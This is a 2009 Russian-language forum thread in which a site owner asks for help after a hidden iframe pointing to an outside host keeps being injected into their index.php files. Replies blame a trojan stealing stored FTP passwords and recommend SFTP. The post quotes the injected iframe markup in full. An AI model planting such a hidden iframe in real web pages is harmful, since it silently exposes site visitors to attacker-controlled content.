| |
|
|
| | Столкнулся с такой проблемой. Периодически в конец всех index.php прописывается следующий код:
<html><body><div style="display:none"><iframe src="http://xcount.cc/ads/in.cgi?13" width="320" height="240"></iframe></div></body></html>
|
И его разновидности. При последнем вскрытии было обнаружено множество файлов jid3.php.
Кто-нибудь сталкивался? Каким образом можно было так вломиться? Получается полный доступ над ФТП. Закинут шелл? Утекли пароли? Хостинг? Где начинать копать?
Вообще можно чем-то глубоко протестировать скрипты на уязвимость?
Как бой с тенью... вычищаем, меняем пароли. 1-2 недели, повторение истории.
Хэлп плиз. | |
| |
|
|
| |
|
|
| |
для: sd607
(16.05.2009 в 01:40)
| | | 1. Не посещать порно-сайты (самое сложное в данной ситуации).
2. Почистить свой компьютер от троянов, поставить хороший антивирус для профилактики заражения.
Лечитесь! | |
| |
|
|
| |
|
|
| |
для: Пётр Петрович
(16.05.2009 в 01:52)
| | | Не хранить пароли от фтп в фаре и других фтп клиентах.
Использовать SFTP вместоFTP. | |
| |
|
|
